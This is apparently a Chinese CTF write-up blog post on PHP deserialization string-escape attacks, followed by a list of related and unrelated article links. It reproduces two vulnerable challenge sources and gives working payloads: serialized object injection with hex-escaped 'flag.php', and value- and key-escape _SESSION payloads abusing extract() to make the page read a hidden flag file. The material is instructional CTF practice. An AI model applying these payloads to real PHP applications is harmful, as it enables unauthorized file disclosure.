刷了一下CTF反序列化的题,去年没有好好了解。又补了一次PHP,害太菜了。每天看看别人的博客真的可以鼓舞人。简单记录一下两道字符串逃逸问题

推荐一个反序列化总结的很好的笔记https://www.cnblogs.com/wjrblogs/p/12800358.html

//变长 直接构造多个关键词,这样就能逃出几个字符

<?php

error_reporting(255);

class A

{

    public  $filename = __FILE__;

    public  function __destruct()

    {

        highlight_file($this->filename);

    }

}

function waf($s)

{

    return preg_replace('/flag/i', 'index', $s);

}

if (isset($_REQUEST['x']) && is_string($_REQUEST['x'])) {

    $a = [

        0 => $_REQUEST['x'],

        1 => '1'

    ];

    @unserialize(waf(serialize($a)));

} else {

    new A();

}

flag->index 长度增加1 逃逸的长度为49 所以需要49的flag

";i:0;O:1:"A":1:{s:8:"filename";s:8:"flag.php";}}

(waf(serialize($a)) ------ flag index 替换了所以[flag.php]要用16进制 然后 s:8 其中S必须大写才会存在16进制

";i:0;O:1:"A":1:{s:8:"filename";s:8:"\66\6c\61\67\2E\70\68\70";}} // i:0 键名无所谓已近到下一层了

//变短 通过键逃逸和值逃逸--------分析思路 先分析再做题 不然思路真的很乱

<?php

$function = @$_GET['f'];

function filter($img)

{

    $filter_arr = array('php', 'flag', 'php5', 'php4', 'fl1g');

    $filter = '/' . implode('|', $filter_arr) . '/i';

    return preg_replace($filter, '', $img);

}

if (@$_SESSION) {

    unset($_SESSION);

}

$_SESSION["user"] = 'guest';

$_SESSION['function'] = $function;

extract($_POST);

if (!$function) {

    echo '<a href="index.php?f=highlight_file">source_code</a>';

}

if (@!$_GET['img_path']) {

    $_SESSION['img'] = base64_encode('guest_img.png');

} else {

    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));

}

$serialize_info = filter(serialize($_SESSION));

if ($function == 'highlight_file') {

    highlight_file('index.php');

} else if ($function == 'phpinfo') {

    eval('phpinfo();'); //maybe you can find something in here!

} else if ($function == 'show_image') {

    $userinfo = unserialize($serialize_info);

    echo file_get_contents(base64_decode($userinfo['img']));

}

$serialize_info = filter(serialize($_SESSION)); 序列化 SESSION数组并且过滤 然后看到$function == 'phpinfo'

我们去phpinfo查看很容易看到d0g3_f1ag.php和PHP处理器

但是这个题目里没有读取session文件,这个题只是把$SESSION数组进行了serialize().这种地方不要因为看到php处理器而犯迷糊。

所以我们大概明确了就是

$userinfo['img']=d0g3_f1ag.php 或者 base64_decode($userinfo['img'])=ZDBnM19mMWFnLnBocA==即可

其中$_SESSION['user']之后有一个extract($_POST); 根据extract()我们可以进行变量覆盖

extract() 函数从数组中将变量导入到当前的符号表,该函数使用数组键名作为变量名,使用数组键值作为变量值

<?php

$_SESSION["user"] = 'guest';

$_SESSION["funtion"] = 'xxx';

extract($_GET);

var_dump($_SESSION);

请求?_SESSION[test]=xxx

array (size=1)

  'test' => string 'xxx' (length=3)

值逃逸:需要两个连续的键值对,由第一个的值覆盖第二个的键,这样第二个值就逃逸出去,单独作为一个键值对~~

_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}  //后面加的是为了键和值保持一致 随便 加前面用_SESSION[xx]=xxx同理

这样我们需要把下一个的键和值当成第一个的值, x代表数字 下一个的值和键需要多少位 然后flag构造多少 因为flag->NULL了。

_SESSION[user]=flagflagflagflagflagflag   ==>  s:4:"user";s:x:""

其中最后一个"会给下一个键一起成为上一个的值

_SESSION[function]=a   ==>  s:7:function;s:x:""

 s:4:"user";s:24:"[";s:8:"function";s:59:"a]"  //括号是值


//键逃逸`,这儿只需要一个键值对就行了,我们直接构造会被过滤的键,这样值得一部分充当键,剩下得一部分作为单独得键值对~~

_SESSION[flagphp]=;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

s:7:"flagphp [";s:67:] ";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}"

过滤的键然后他的值的属性 成为键的值 先计算键的值然后再去构造键。然后查看源代码

<?php

$flag = 'flag in /d0g3_fllllllag';

?>

将/d0g3_fllllllag base64编码就好。

参考:https://blog.csdn.net/a3320315/article/details/104118688/

CTF反序列化逃逸的更多相关文章

  1. [0CTF 2016]piapiapia(反序列逃逸)

    我尝试了几种payload,发现有两种情况. 第一种:Invalid user name 第二种:Invalid user name or password 第一步想到的是盲注或者报错,因为fuzz一 ...

  2. BUUCTF[归纳]sql注入相关题目

    这是我自己对于sql注入的部分ctf题型的归纳,均来自buuctf的平台环境. [0CTF 2016]piapiapia 我尝试了几种payload,发现有两种情况. 第一种:Invalid user ...

  3. php代码审计整理

    目录 变量覆盖 1x01.extract 变量覆盖 定义和用法 语法 漏洞产生:使用了默认设置 攻击方法:制造变量名冲突,对于需要相等的值可以同时置空 修复:设定一个冲突时的处理规则 例题: 1x02 ...

  4. 2020新春公益赛 writeup

    简单的招聘系统 无需注册账号,admin'or 1#登陆,到blank page页面,在输入key处发现有注入点: /pages-blank.php?key=1%27+union+select+1%2 ...

  5. BUUCTF知识记录

    [强网杯 2019]随便注 先尝试普通的注入 发现注入成功了,接下来走流程的时候碰到了问题 发现过滤了select和where这个两个最重要的查询语句,不过其他的过滤很奇怪,为什么要过滤update, ...

  6. UNCTF2020 web writeup

    1.Easy_ssrf 给了file_get_contents,直接读取flag即可 2.Easyunserialize 利用点在 构造uname反序列化逃逸即可 3.Babyeval 两个过滤,绕过 ...

  7. 从一道ctf看php反序列化漏洞的应用场景

    目录 0x00 first 前几天joomla爆出个反序列化漏洞,原因是因为对序列化后的字符进行过滤,导致用户可控字符溢出,从而控制序列化内容,配合对象注入导致RCE.刚好今天刷CTF题时遇到了一个类 ...

  8. 详解PHP反序列化中的字符逃逸

    首发先知社区,https://xz.aliyun.com/t/6718/ PHP 反序列化字符逃逸 下述所有测试均在 php 7.1.13 nts 下完成 先说几个特性,PHP 在反序列化时,对类中不 ...

  9. GYCTF easyphp 【反序列化配合字符逃逸】

    基础知识可以参考我之前写的那个 0CTF 2016 piapiapia  那个题只是简单记录了一下,学习了一下php反序列化的思路 https://www.cnblogs.com/tiaopideju ...

随机推荐

  1. Linux 挂载盘

    在192.168.6.203上,挂接第二块硬盘 fdisk -l 1.fdisk /dev/vdb 命令(输入 m 获取帮助):n Partition type: p primary (0 prima ...

  2. Jenkins-java项目自动发布

    path="${WORKSPACE}/git" # 创建目录 if [ -d $path ]; then echo "The files is already exist ...

  3. jquery 改变标签样式

    jQuery改变标签的样式一般有3种 预置好class,然后通过jQuery改变元素的class名,使用的是addClass.removeClass 直接改变元素的css属性值,这种是通过添加styl ...

  4. 异步编程CompletableFuture

    多线程优化性能,串行操作并行化 串行操作 // 以下2个都是耗时操作 doBizA(); doBizB(); 修改变为并行化 new Thread(() -> doBizA()).start() ...

  5. 摄像头 ISP 调试的入门之谈(经验总结)

    在讲述本文之前,我尽量以一个什么也不清楚的初学到入门的用词来阐述什么是 ISP 调试,以及为什么需要调试. 如果你从来都没有接触过什么是摄像头 ISP 调试,我想这个文章可以给你一些启发和关键词. 因 ...

  6. Handler_read_*的总结

    在分析一个SQL的性能好坏时,除了执行计划,另外一个常看的指标是"Handler_read_*"相关变量. Handler_read_key Handler_read_first ...

  7. 合宙Luat | 电源设计——模块应用必看的2个要点

    在模块应用设计中,电源设计是很重要的一部分. 由于射频发射时,会在短时间有一个较大电流的突发脉冲.在突发脉冲阶段内,电源必须能够提供高的峰值电流,不然有可能会引起供电电压的跌落.   而很多初学的朋友 ...

  8. 【dp】10-15题解 snake vs block

    snake vs block 题目描述 Tgopknight最近迷上了一款叫做Snake vs Block的游戏,他总觉得他自己玩出的不是最优解,但是他忙于享受游戏的乐趣,只好请你帮忙找出最优解. S ...

  9. noip2012 总结

    Vigenère 密码 题目描述 16 世纪法国外交家 Blaise de Vigenère 设计了一种多表密码加密算法――Vigenère 密码.Vigenère 密码的加密解密算法简单易用,且破译 ...

  10. expdp数据泵导出数据汇总

    [oracle@enmo1 ~]$ mkdir datadump[oracle@enmo1 ~]$ cd datadump/[oracle@enmo1 datadump]$ pwd/home/orac ...